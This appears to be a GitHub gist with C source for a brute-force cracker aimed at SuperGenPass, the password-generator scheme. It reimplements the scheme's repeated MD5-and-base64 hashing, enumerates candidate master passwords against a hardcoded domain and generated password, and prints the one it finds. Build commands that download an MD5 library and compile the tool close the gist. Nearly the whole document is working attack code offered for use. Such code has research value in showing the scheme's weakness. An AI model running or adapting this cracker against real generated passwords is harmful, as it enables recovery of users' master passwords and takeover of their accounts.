Created
September 8, 2011 21:45
-
-
Save btoews/1204848 to your computer and use it in GitHub Desktop.
Supergenpass Bruteforcer in C
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <math.h> | |
#include <stdint.h> | |
#include <stdlib.h> | |
#include <stdio.h> | |
#include <string.h> | |
#include <time.h> | |
#include "global.h" | |
#include "md5.h" | |
static char encoding_table[] = {'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', | |
'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', | |
'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', | |
'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', | |
'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', | |
'o', 'p', 'q', 'r', 's', 't', 'u', 'v', | |
'w', 'x', 'y', 'z', '0', '1', '2', '3', | |
'4', '5', '6', '7', '8', '9', '+', '/'}; | |
static int mod_table[] = {0, 2, 1}; | |
char* domain = "jonesbigasswebsiteandmerchandisecenter.com"; | |
char* checkhash = "fwYHFFx5xs"; | |
char* charset = "aeorisn1tl2md0cp3hbuk45g9687yfwjvzxqASERBTMLNPOIDCHGKFJUW.!Y*@V-ZQX_$#,/+?;^ %~=&`\\)][:<(>\"|{'}"; | |
int charsetlen = 95; | |
time_t starttime,currenttime; | |
int attempts=0; | |
static void MDString PROTO_LIST ((char *)); | |
#define MD5_CTX MD5_CTX | |
#define MDInit MD5Init | |
#define MDUpdate MD5Update | |
#define MDFinal MD5Final | |
static void MDString(char *string, unsigned char* digest) | |
{ | |
MD5_CTX context; | |
unsigned int len = strlen (string); | |
MDInit (&context); | |
MDUpdate (&context, string, len); | |
MDFinal (digest, &context); | |
} | |
char* base64_encode(const unsigned char *data,size_t input_length,size_t *output_length) { | |
*output_length = (size_t) (4.0 * ceil((double) input_length / 3.0)); | |
char *encoded_data = malloc(*output_length); | |
if (encoded_data == NULL) return NULL; | |
int i,j; | |
for (i = 0, j = 0; i < input_length;) { | |
uint32_t octet_a = i < input_length ? data[i++] : 0; | |
uint32_t octet_b = i < input_length ? data[i++] : 0; | |
uint32_t octet_c = i < input_length ? data[i++] : 0; | |
uint32_t triple = (octet_a << 0x10) + (octet_b << 0x08) + octet_c; | |
encoded_data[j++] = encoding_table[(triple >> 3 * 6) & 0x3F]; | |
encoded_data[j++] = encoding_table[(triple >> 2 * 6) & 0x3F]; | |
encoded_data[j++] = encoding_table[(triple >> 1 * 6) & 0x3F]; | |
encoded_data[j++] = encoding_table[(triple >> 0 * 6) & 0x3F]; | |
} | |
for (i = 0; i < mod_table[input_length % 3]; i++) | |
encoded_data[*output_length - 1 - i] = '='; | |
return encoded_data; | |
} | |
char* base64digest(char* tohash) { | |
unsigned char digest[16]; | |
MDString(tohash,digest); | |
char* ret; | |
size_t outsize; | |
ret = base64_encode(digest,(size_t)16,&outsize); | |
return ret; | |
} | |
unsigned strcpy_translate_check(char* dst, const char* src){ | |
char* transfrom = "=+/"; | |
char* transto = "A98"; | |
unsigned lower = 0; | |
unsigned upper = 0; | |
unsigned numeric = 0; | |
unsigned i=0; | |
//we make sure that the hash starts with a lower case letter | |
if(src[i]>=97 && src[i]<=122) | |
lower=1; | |
for(i=0;src[i]!='\0';i++){ | |
dst[i] = src[i]; | |
//we make sure that the hash includes an upper case letter | |
if(src[i]>=60 && src[i]<=90) | |
upper=1; | |
//we make sure that the hash includes a number | |
if(src[i]>=48 && src[i]<=57) | |
numeric=1; | |
//for some reason supergen pass doesn't like | |
//there chars so we filter them out and replace them | |
unsigned x; | |
for(x=0;transfrom[x]!='\0';x++){ | |
if(src[i]==transfrom[x]) { | |
dst[i]=transto[x]; | |
} | |
} | |
} | |
dst[i] = '\0'; | |
return (lower && upper && numeric); | |
} | |
char* supergenpass(char* password,char* domain){ | |
char* tohash = malloc(100); | |
strcpy(tohash,password); | |
strcat(tohash,":"); | |
strcat(tohash,domain); | |
char* hashed = malloc(25); | |
int i; | |
unsigned ret = 1; | |
for(i=0;i<10 || ret==0;i++){ | |
hashed = base64digest(tohash); | |
ret = strcpy_translate_check(tohash,hashed); | |
} | |
char* output = malloc(11); | |
for(i=0;i<10;i++) | |
{ | |
output[i]=tohash[i]; | |
} | |
output[i]='\0'; | |
return output; | |
} | |
int recurse(char* string,int stringlen,int length){ | |
int i; | |
int ret=0; | |
char* toyield = malloc(stringlen); | |
char* tmptoyield = malloc(stringlen+1); | |
strcpy(toyield,string); | |
for(i=0;i<charsetlen;i++) { | |
toyield[stringlen-1]=charset[i]; | |
if(stringlen == length) { | |
//performance monitoring stuff | |
attempts++; | |
if(attempts % 100000 == 0){ | |
time(¤ttime); | |
int t = currenttime-starttime; | |
printf("Checking: %s\n",toyield); | |
printf("Attempts: %d\n",attempts); | |
printf("Time : %d\n",t); | |
printf("Speed : %f a/s\n\n",((float)attempts/(float)t)); | |
} | |
if(strcmp(supergenpass(toyield,domain),checkhash)==0){ | |
printf("Found password: %s\n",toyield); | |
free(toyield); | |
return 1; | |
} | |
} | |
else { | |
strcpy(tmptoyield,toyield); | |
strcat(tmptoyield,"a"); | |
ret = recurse(tmptoyield,stringlen+1,length); | |
} | |
if(ret==1){ | |
free(toyield); | |
return 1; | |
} | |
} | |
free(toyield); | |
return 0; | |
} | |
void main(int argc, char *argv[]){ | |
//set our starttime for performance checking | |
time(&starttime); | |
int i; | |
for(i=1;i<10;i++) | |
if(recurse("a",1,i)==1) | |
i=1000; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ wget http://userpages.umbc.edu/~mabzug1/cs/md5/md5-c-100.tar.gz | |
$ tar xvzf md5-c-100.tar.gz | |
$ cp ./md5-c/* ./ | |
$ make | |
$ gcc -lm -g -o brute brute.c md5c.o | |
$ ./brute |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment